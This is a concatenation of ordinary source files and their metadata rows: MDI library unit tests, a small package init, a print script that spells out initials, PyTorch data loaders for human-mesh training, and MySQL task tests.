assert mdi.MDI_Conversion_Factor("atomic_mass_unit", "kilogram") == pytest.approx(1.66053904e-27)
assert mdi.MDI_Conversion_Factor("atomic_mass_unit", "gram") == pytest.approx(1.66053904e-24)
assert mdi.MDI_Conversion_Factor("atomic_mass_unit", "atomic_mass_unit") == pytest.approx(1.0)
# Test all time conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_time", "atomic_unit_of_time") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_time", "picosecond") == pytest.approx(2.4188843265857007e-05)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_time", "second") == pytest.approx(2.4188843265857007e-17)
assert mdi.MDI_Conversion_Factor("picosecond", "atomic_unit_of_time") == pytest.approx(1.0 / 2.4188843265857007e-05)
assert mdi.MDI_Conversion_Factor("picosecond", "picosecond") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("picosecond", "second") == pytest.approx(1.0e-12)
assert mdi.MDI_Conversion_Factor("second", "atomic_unit_of_time") == pytest.approx(1.0 / 2.4188843265857007e-17)
assert mdi.MDI_Conversion_Factor("second", "picosecond") == pytest.approx(1.0e+12)
assert mdi.MDI_Conversion_Factor("second", "second") == pytest.approx(1.0)
# Test exceptions for unrecognized units
with pytest.raises(Exception):
assert mdi.MDI_Conversion_Factor("fake_unit","bohr")
with pytest.raises(Exception):
assert mdi.MDI_Conversion_Factor("angstrom","")
# Test exceptions for inconsistent unit types
with pytest.raises(Exception):
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy","atomic_unit_of_time")
with pytest.raises(Exception):
assert mdi.MDI_Conversion_Factor("meter","calorie")
##########################
# Error Tests #
##########################
def test_uninitialized():
comm = mdi.MDI_NULL_COMM
# Test exceptions when MDI is not initialized
with pytest.raises(Exception):
mdi.MDI_Accept_Communicator()
with pytest.raises(Exception):
mdi.MDI_Send([1, 2], 2, mdi.MDI_INT, comm)
with pytest.raises(Exception):
mdi.MDI_Recv(2, mdi.MDI_INT, comm)
with pytest.raises(Exception):
mdi.MDI_Send_Command("<VERSION", comm)
with pytest.raises(Exception):
mdi.MDI_Recv_Command(comm)
with pytest.raises(Exception):
mdi.MDI_Register_Node("TESTNODE")
with pytest.raises(Exception):
mdi.MDI_Check_Node_Exists("TESTNODE", comm)
with pytest.raises(Exception):
mdi.MDI_Get_Node(0, comm, "TESTNODE")
with pytest.raises(Exception):
mdi.MDI_Get_NNodes(comm)
with pytest.raises(Exception):
mdi.MDI_Get_Node(0, comm)
with pytest.raises(Exception):
mdi.MDI_Register_Command("TESTNODE", "TESTCOMM")
with pytest.raises(Exception):
mdi.MDI_Check_Command_Exists("TESTNODE", "TESTCOMM", comm)
with pytest.raises(Exception):
mdi.MDI_Get_NCommands("TESTNODE", comm)
with pytest.raises(Exception):
mdi.MDI_Get_Command("TESTNODE", 0, comm)
with pytest.raises(Exception):
mdi.MDI_Register_Callback("TESTNODE", "TESTCALL")
with pytest.raises(Exception):
mdi.MDI_Check_Callback_Exists("TESTNODE", "TESTCALL", comm)
with pytest.raises(Exception):
mdi.MDI_Get_NCallbacks("TESTNODE", comm)
with pytest.raises(Exception):
mdi.MDI_Get_Callback("TESTNODE", 0, comm)
def test_test_method():
# run the calculation
driver_proc = subprocess.Popen([sys.executable, "../build/ut_tmethod.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Cannot register node name with length greater than MDI_COMMAND_LENGTH
Node name is greater than MDI_COMMAND_LENGTH
Vector accessed out-of-bounds
MDI_Get_Node unable to find node
Node name is greater than MDI_COMMAND_LENGTH
Cannot chcek command name with length greater than MDI_COMMAND_LENGTH
Could not find the node
Node name is greater than MDI_COMMAND_LENGTH
Could not find the node
MDI_Get_Command could not find the requested node
MDI_Get_Command failed because the command does not exist
Node name is greater than MDI_COMMAND_LENGTH
Cannot check callback name with length greater than MDI_COMMAND_LENGTH
Could not find the node
Node name is greater than MDI_COMMAND_LENGTH
Could not find the node
MDI_Get_Command could not find the requested node
MDI_Get_Command failed because the command does not exist
"""
assert driver_err == expected_err
assert driver_out == ""
def test_init_errors():
# Test running with no -method option
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_method.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = ""
assert driver_err == expected_err
assert driver_out == ""
# Test running with no -name option
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_name.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: -name option not provided
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with no -role option
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_role.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: -role option not provided
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with no -port option for a DRIVER using TCP
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_port_d.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: -port option not provided
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with no -port option for an ENGINE using TCP
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_port_e.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: -port option not provided
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with no -hostname option for an ENGINE using TCP
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_no_hostname.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: -hostname option not provided
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with a fake option
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_fake_opt.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Unrecognized option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with a fake method
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_fake_method.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Method not recognized
"""
assert driver_err == expected_err
assert driver_out == ""
# Test running with a fake role
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_fake_role.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Role not recognized
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -role argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_role.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -role option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -method argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_method.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = ""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -name argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_name.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -name option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -hostname argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_hostname.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -hostname option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -port argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_port.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -port option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -out argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_out.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -out option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -driver_name argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_driver_name.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -driver_name option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test leaving off the -_language argument
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_noarg_language.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """Error in MDI_Init: Argument missing from -_language option
"""
assert driver_err == expected_err
assert driver_out == ""
# Test double initialization
driver_proc = subprocess.Popen([sys.executable, "../build/ut_init_double.py"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected_err = """MDI_Init called after MDI was already initialized
"""
assert driver_err == expected_err
assert driver_out == ""
| 44.646861
| 185
| 0.683792
| 5,409
| 39,825
| 4.793123
| 0.053614
| 0.042698
| 0.056931
| 0.06642
| 0.912675
| 0.905423
| 0.891692
| 0.859909
| 0.816092
| 0.746895
| 0
| 0.040668
| 0.192392
| 39,825
| 891
| 186
| 44.69697
| 0.765414
| 0.106918
| 0
| 0.712919
| 0
| 0.00319
| 0.238359
| 0.04628
| 0
| 0
| 0
| 0
| 0.244019
| 1
| 0.043062
| false
| 0
| 0.012759
| 0
| 0.057416
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b71531c40a544879f67af037dc63f3658cb349e8
| 108
|
py
|
Python
|
sdt_metrics/__init__.py
|
bollaking/sdt-metrics
|
2132801c36e69102d5c7a042062ba80535cef0f1
|
[
"BSD-3-Clause"
] | null | null | null |
sdt_metrics/__init__.py
|
bollaking/sdt-metrics
|
2132801c36e69102d5c7a042062ba80535cef0f1
|
[
"BSD-3-Clause"
] | null | null | null |
sdt_metrics/__init__.py
|
bollaking/sdt-metrics
|
2132801c36e69102d5c7a042062ba80535cef0f1
|
[
"BSD-3-Clause"
] | null | null | null |
from .support import *
from .plotting import *
from ._sdt_metrics import *
from ._sdt_metrics import _S
| 21.6
| 29
| 0.75
| 15
| 108
| 5.066667
| 0.466667
| 0.394737
| 0.342105
| 0.526316
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.185185
| 108
| 4
| 30
| 27
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3fd1c5c4baa65d34af26e01f7c009304540f1897
| 605
|
py
|
Python
|
Initials.py
|
Queen-Jonnie/Work
|
0197644b09700c8ed9576f8270f3f334588cabc9
|
[
"Apache-2.0"
] | null | null | null |
Initials.py
|
Queen-Jonnie/Work
|
0197644b09700c8ed9576f8270f3f334588cabc9
|
[
"Apache-2.0"
] | null | null | null |
Initials.py
|
Queen-Jonnie/Work
|
0197644b09700c8ed9576f8270f3f334588cabc9
|
[
"Apache-2.0"
] | null | null | null |
print("My name is Jessica Bonnie Ayomide")
print("JJJJJJJJJJJJJ BBBBBBBBBB A")
print(" J B B A A")
print(" J B B A A")
print(" J B B A A")
print(" J B B A A")
print(" J BBBBBBBBBB AAAAAAAAAA")
print(" J B B A A")
print(" J B B A A")
print("J J B B A A")
print(" J J B B A A")
print(" JJJJJ BBBBBBBBBB A A")
| 46.538462
| 51
| 0.317355
| 70
| 605
| 2.742857
| 0.2
| 0.28125
| 0.291667
| 0.166667
| 0.489583
| 0.489583
| 0.489583
| 0.489583
| 0.489583
| 0.489583
| 0
| 0
| 0.603306
| 605
| 12
| 52
| 50.416667
| 0.8
| 0
| 0
| 0.666667
| 0
| 0
| 0.797639
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b7510df03978635b1d1dd94e0cc082003f3aa08e
| 17,418
|
py
|
Python
|
src/data_loader.py
|
Taye310/hmd
|
46d453392213b8ead39f8e850054fc7bbb81146b
|
[
"MIT"
] | null | null | null |
src/data_loader.py
|
Taye310/hmd
|
46d453392213b8ead39f8e850054fc7bbb81146b
|
[
"MIT"
] | null | null | null |
src/data_loader.py
|
Taye310/hmd
|
46d453392213b8ead39f8e850054fc7bbb81146b
|
[
"MIT"
] | null | null | null |
from torch.utils.data.dataset import Dataset
import numpy as np
import PIL.Image
import random
import json
import pickle
import torchvision.transforms as transforms
from utility import center_crop
import os
import cv2
import configparser
conf = configparser.ConfigParser()
conf.read(u'../conf.ini', encoding='utf8')
tgt_path = conf.get('DATA', 'tgt_path')
#==============================================================================
# data loader for joint train/test
#==============================================================================
class dataloader_joint(Dataset):
def __init__(self,
sil_ver = False,
train = True,
transform = transforms.Compose([transforms.ToTensor()]),
manual_seed = 1234,
shuffle = True,
get_all = False,
):
if train is True:
self.dataset_dir = tgt_path + "train/"
# self.num = 24149*10 #13938, non dr augment version
self.num = 8035*10
else:
self.dataset_dir = tgt_path + "test/"
self.num = 4625*10
# transfer arg
self.sil_ver = sil_ver
self.transform = transform
self.get_all = get_all
# make random seed
if manual_seed is None:
manual_seed = random.randint(1, 10000)
random.seed(manual_seed)
# make data_id list and shuffle
self.id_list = list(range(self.num))
if shuffle is True:
random.shuffle(self.id_list)
def __len__(self):
return self.num
def __getitem__(self, index):
crt_id = self.id_list[index]
img_id = int(np.floor(crt_id / 10))
joint_id = crt_id % 10
# get sil
all_sil = np.array(PIL.Image.open(self.dataset_dir +
"sil/%08d.png" % img_id))
all_sil[all_sil<128] = 0
all_sil[all_sil>=128] = 255
# get parameters
with open (self.dataset_dir + "/para/%08d.json" % img_id, 'rb') as fp:
para_dic = json.load(fp)
joint_move = para_dic["joint_move"]
joint_posi = para_dic["joint_posi"]
# make target para
tgt_para = np.array(joint_move[(joint_id*2):(joint_id*2+2)])
if self.sil_ver is False:
# make input array for image version
img_file = para_dic["img_file"]
src_img = np.array(PIL.Image.open(self.dataset_dir + img_file))
src_sil = np.expand_dims(all_sil[:,:,1], 2)
crop_sil = center_crop(src_sil, joint_posi[joint_id], 64)
crop_img = center_crop(src_img, joint_posi[joint_id], 64)
crop_img = crop_img.astype(np.int)
crop_img = crop_img - crop_img[31, 31, :]
crop_img = np.absolute(crop_img)
src_in = np.concatenate((crop_sil, crop_img), axis = 2)
else:
# make input array for silhouette version
src_sil = all_sil[:,:,:2]
src_in = center_crop(src_sil, joint_posi[joint_id], 64)
# transform as torch tensor
src_in = PIL.Image.fromarray(src_in.astype(np.uint8))
if self.transform != None:
src_in = self.transform(src_in)
if self.get_all is True and self.sil_ver is False:
# get verts and vert_norms
verts = np.array(para_dic["verts"])
vert_norms = np.array(para_dic["vert_norms"])
proc_para = para_dic["proc_para"]
return (src_in, tgt_para, src_img, verts,
vert_norms, proc_para, all_sil)
else:
return (src_in, tgt_para)
#==============================================================================
# data loader for anchor train/test
#==============================================================================
class dataloader_anchor(Dataset):
def __init__(self,
sil_ver = False,
train = True,
transform = transforms.Compose([transforms.ToTensor()]),
manual_seed = 1234,
shuffle = True,
get_all = False,
):
if train is True:
self.dataset_dir = tgt_path + "train/"
self.num = 24149*200 #13938, non dr augment version
self.num = 8035*10
else:
self.dataset_dir = tgt_path + "test/"
self.num = 4625*200
# transfer arg
self.sil_ver = sil_ver
self.transform = transform
self.get_all = get_all
# make random seed
if manual_seed is None:
manual_seed = random.randint(1, 10000)
random.seed(manual_seed)
# make data_id list and shuffle
self.id_list = list(range(self.num))
if shuffle is True:
random.shuffle(self.id_list)
def __len__(self):
return self.num
def __getitem__(self, index):
crt_id = self.id_list[index]
img_id = int(np.floor(crt_id / 200))
achr_id = crt_id % 200
# get sil
all_sil = np.array(PIL.Image.open(self.dataset_dir +
"sil/%08d.png" % img_id))
all_sil[all_sil<128] = 0
all_sil[all_sil>=128] = 255
# get parameters
with open (self.dataset_dir + "/para/%08d.json" % img_id, 'rb') as fp:
para_dic = json.load(fp)
achr_move = np.array(para_dic["achr_move"])
achr_posi = para_dic["achr_posi"]
# get source image
img_file = para_dic["img_file"]
src_img = np.array(PIL.Image.open(self.dataset_dir + img_file))
tgt_para = achr_move[achr_id]
tgt_para = np.expand_dims(tgt_para, 0)
if self.sil_ver is False:
src_sil = np.expand_dims(all_sil[:,:,2], 2)
crop_sil = center_crop(src_sil, achr_posi[achr_id], 32)
crop_img = center_crop(src_img, achr_posi[achr_id], 32)
crop_img = crop_img.astype(np.int)
crop_img = crop_img - crop_img[15, 15, :]
crop_img = np.absolute(crop_img)
src_in = np.concatenate((crop_sil, crop_img), axis = 2)
else:
# make input array for silhouette version
src_sil = np.stack((all_sil[:,:,0], all_sil[:,:,2]), axis = -1)
src_in = center_crop(src_sil, achr_posi[achr_id], 32)
# transform as torch tensor
src_in = PIL.Image.fromarray(src_in.astype(np.uint8))
if self.transform != None:
src_in = self.transform(src_in)
if self.get_all is True and self.sil_ver is False:
# get verts and vert_norms
verts = np.array(para_dic["verts"])
vert_norms = np.array(para_dic["vert_norms"])
proc_para = para_dic["proc_para"]
return (src_in, tgt_para, src_img, verts,
vert_norms, proc_para, all_sil)
else:
return (src_in, tgt_para)
#==============================================================================
# data loader for shading training/testing
#==============================================================================
class dataloader_shading(Dataset):
def __init__(self,
train = True,
manual_seed = 1234,
shuffle = True,
):
self.depth_gt_dir = "/home/zhangtianyi/ShareFolder/data/hmd_masked/train/complete_depth/"
self.src_img_dir = "/home/zhangtianyi/ShareFolder/data/hmd_2/train/img/"
self.src_img_list = os.listdir(self.src_img_dir)
# self.depth_gt_list = os.listdir(self.depth_gt_dir)
self.num = len(self.src_img_list)
# make random seed
if manual_seed is None:
manual_seed = random.randint(1, 10000)
random.seed(manual_seed)
# make data_id list and shuffle
self.id_list = list(range(self.num))
if shuffle is True:
random.shuffle(self.id_list)
def __len__(self):
return self.num
def __getitem__(self, index):
tuple_id = self.id_list[index]
# get source image
src_img = np.array(PIL.Image.open(self.src_img_dir + self.src_img_list[tuple_id]))
src_img = cv2.resize(src_img, dsize=(448, 448))
src_img = np.rollaxis(src_img, 2, 0) / 255.0
# src_img = np.resize(src_img, (3, 488, 488))
# print(src_img.shape)
# print("src_img_name:",self.src_img_dir + self.src_img_list[tuple_id] + "/std_img.jpg",
# "depth_gt_name:",self.depth_gt_dir + self.src_img_list[tuple_id] + "_depth_mask.npy")
# get gt depth
depth_gt = np.load(self.depth_gt_dir + self.src_img_list[tuple_id][:-4] + "_depth_mask.npy")
# depth_gt = depth_gt
# print("depth_gt path:",self.depth_gt_dir + self.depth_gt_list[tuple_id])
# print(depth_gt[250])
depth_gt = np.expand_dims(depth_gt, 0)
# # get smooth depth
# f_dsm = open(self.dataset_dir + 'smoothD_%04d.bin' % tuple_id, "rb")
# depth_sm = np.resize(np.fromfile(f_dsm, dtype=np.float32),
# (448, 448)).transpose()
# # compute depth difference
# depth_diff = depth_gt - depth_sm
# depth_diff = depth_diff * 10
# depth_diff = np.expand_dims(depth_diff, 0)
# # get mask
# mask = np.zeros(depth_diff.shape)
# mask[depth_diff!=0] = 1
temp = depth_gt
mask = np.zeros(temp.shape)
mask[temp!=0] = 1
return (src_img, depth_gt, mask)
#==============================================================================
# data loader for efficient predicting test
#==============================================================================
class dataloader_pred(Dataset):
def __init__(self,
train = True,
manual_seed = 1234,
shuffle = True,
dataset_path = None,
):
if dataset_path is None:
dataset_path = tgt_path
if train is True:
self.dataset_dir = dataset_path+"train/"
self.num = 24149 #13938, non dr augment version
else:
self.dataset_dir = dataset_path+"test/"
self.num = 4625
# make random seed
if manual_seed is None:
manual_seed = random.randint(1, 10000)
random.seed(manual_seed)
# make data_id list and shuffle
self.id_list = list(range(self.num))
if shuffle is True:
random.shuffle(self.id_list)
def __len__(self):
return self.num
def __getitem__(self, index):
img_id = self.id_list[index]
# get sil
all_sil = np.array(PIL.Image.open(self.dataset_dir +
"sil/%08d.png" % img_id))
all_sil[all_sil<128] = 0
all_sil[all_sil>=128] = 1
# get parameters
with open (self.dataset_dir + "/para/%08d.json" % img_id, 'rb') as fp:
para_dic = json.load(fp)
# get src_img and pre-processing parameters
img_file = para_dic["img_file"]
src_img = np.array(PIL.Image.open(self.dataset_dir + img_file))
proc_para = para_dic["proc_para"]
# get verts and vert_norms
verts = np.array(para_dic["verts"])
vert_norms = np.array(para_dic["vert_norms"])
# get joint move and position
joint_move = np.array(para_dic["joint_move"])
joint_posi = para_dic["joint_posi"]
# get anchor move and position
achr_move = np.array(para_dic["achr_move"])
achr_posi = para_dic["achr_posi"]
# make source for joint net
sil_j = np.expand_dims(all_sil[:,:,1], 2)
src_j = np.zeros((10, 4, 64, 64))
for i in range(len(joint_posi)):
crop_sil = center_crop(sil_j, joint_posi[i], 64)
crop_img = center_crop(src_img, joint_posi[i], 64)
crop_img = crop_img.astype(np.float)
crop_img = crop_img - crop_img[31, 31, :]
crop_img = np.absolute(crop_img)
crop_img = crop_img/255.0
src_j[i,0,:,:] = np.rollaxis(crop_sil, 2, 0)
src_j[i,1:4,:,:] = np.rollaxis(crop_img, 2, 0)
# make source for anchor net
src_a = None
# commentted because prediction didn't require this
'''
sil_a = np.stack((all_sil[:,:,0], all_sil[:,:,2]), axis = -1)
src_a = np.zeros((200, 2, 32, 32))
for i in range(len(achr_posi)):
crop_sil = center_crop(sil_a, achr_posi[i], 32)
src_a[i,:,:,:] = np.rollaxis(crop_sil, 2, 0)
'''
return (src_j, src_a, src_img, joint_move, achr_move, verts,
vert_norms, proc_para, all_sil, joint_posi, achr_posi)
#==============================================================================
# data loader for efficient predicting test, sil version
#==============================================================================
class dataloader_sil_pred(Dataset):
def __init__(self,
train = True,
manual_seed = 1234,
shuffle = True,
dataset_path = None,
):
if dataset_path is None:
dataset_path = tgt_path
if train is True:
self.dataset_dir = dataset_path + "train/"
self.num = 24149 #13938, non dr augment version
else:
self.dataset_dir = dataset_path + "test/"
self.num = 4625
# make random seed
if manual_seed is None:
manual_seed = random.randint(1, 10000)
random.seed(manual_seed)
# make data_id list and shuffle
self.id_list = list(range(self.num))
if shuffle is True:
random.shuffle(self.id_list)
def __len__(self):
return self.num
def __getitem__(self, index):
img_id = self.id_list[index]
# get sil
all_sil = np.array(PIL.Image.open(self.dataset_dir +
"sil/%08d.png" % img_id))
all_sil[all_sil<128] = 0
all_sil[all_sil>=128] = 1
# get parameters
with open (self.dataset_dir + "/para/%08d.json" % img_id, 'rb') as fp:
para_dic = json.load(fp)
# get src_img and pre-processing parameters
img_file = para_dic["img_file"]
src_img = np.array(PIL.Image.open(self.dataset_dir + img_file))
proc_para = para_dic["proc_para"]
# get verts and vert_norms
verts = np.array(para_dic["verts"])
vert_norms = np.array(para_dic["vert_norms"])
# get joint move and position
joint_move = np.array(para_dic["joint_move"])
joint_posi = para_dic["joint_posi"]
# get anchor move and position
achr_move = np.array(para_dic["achr_move"])
achr_posi = para_dic["achr_posi"]
# make source for joint net
sil_j = all_sil[:,:,:2]
src_j = np.zeros((10, 2, 64, 64))
for i in range(len(joint_posi)):
crop_sil = center_crop(sil_j, joint_posi[i], 64)
src_j[i,:,:,:] = np.rollaxis(crop_sil, 2, 0)
# make source for anchor net
src_a = None
# commentted because prediction didn't require this
'''
sil_a = np.stack((all_sil[:,:,0], all_sil[:,:,2]), axis = -1)
src_a = np.zeros((200, 2, 32, 32))
for i in range(len(achr_posi)):
crop_sil = center_crop(sil_a, achr_posi[i], 32)
src_a[i,:,:,:] = np.rollaxis(crop_sil, 2, 0)
'''
return (src_j, src_a, src_img, joint_move, achr_move, verts,
vert_norms, proc_para, all_sil, joint_posi, achr_posi)
#==============================================================================
# data loader for efficient demo (no ground-truth reading, only test)
#==============================================================================
class dataloader_demo(Dataset):
def __init__(self, dataset_path):
self.dataset_dir = dataset_path+"test/"
self.num = 4625
self.id_list = list(range(self.num))
def __len__(self):
return self.num
def __getitem__(self, index):
img_id = self.id_list[index]
# get parameters
with open (self.dataset_dir + "/para/%08d.json" % img_id, 'rb') as fp:
para_dic = json.load(fp)
# get src_img and pre-processing parameters
img_file = para_dic["img_file"]
src_img = np.array(PIL.Image.open(self.dataset_dir + img_file))
proc_para = para_dic["proc_para"]
# get verts and vert_norms
verts = np.array(para_dic["verts"])
vert_norms = np.array(para_dic["vert_norms"])
return (src_img, verts, vert_norms)
| 37.059574
| 100
| 0.524056
| 2,191
| 17,418
| 3.893199
| 0.090826
| 0.030363
| 0.03939
| 0.031653
| 0.823095
| 0.811958
| 0.781008
| 0.75932
| 0.756389
| 0.728722
| 0
| 0.029402
| 0.322425
| 17,418
| 469
| 101
| 37.138593
| 0.693357
| 0.190263
| 0
| 0.765517
| 0
| 0
| 0.04583
| 0.008779
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062069
| false
| 0
| 0.037931
| 0.02069
| 0.168966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b77bb594277aad12ca4e874bc36e5e0acbbb6f99
| 3,766
|
py
|
Python
|
tests/tasks/mysql/test_mysql.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | 3
|
2021-11-09T10:46:58.000Z
|
2022-03-11T04:22:35.000Z
|
tests/tasks/mysql/test_mysql.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | null | null | null |
tests/tasks/mysql/test_mysql.py
|
vlad-mois/prefect
|
5427ddb2e49dc4732ad034c58ed2604ea1faa4a3
|
[
"Apache-2.0"
] | 1
|
2022-03-11T04:22:40.000Z
|
2022-03-11T04:22:40.000Z
|
import pytest
import pymysql
from unittest.mock import MagicMock
from prefect.tasks.mysql.mysql import MySQLExecute, MySQLFetch
class TestMySQLExecute:
def test_construction(self):
task = MySQLExecute(db_name="test", user="test", password="test", host="test")
assert (task.commit is False) and (task.charset == "utf8mb4")
def test_query_string_must_be_provided(self):
task = MySQLExecute(db_name="test", user="test", password="test", host="test")
with pytest.raises(ValueError, match="A query string must be provided"):
task.run()
def test_run_args_used_over_init_args(self, monkeypatch):
mock_connect = MagicMock()
monkeypatch.setattr("pymysql.connect", mock_connect)
task = MySQLExecute(
db_name="test", user="test", password="initpassword", host="test"
)
task.run(query="select * from users", password="password_from_secret")
assert mock_connect.call_args[1]["password"] == "password_from_secret"
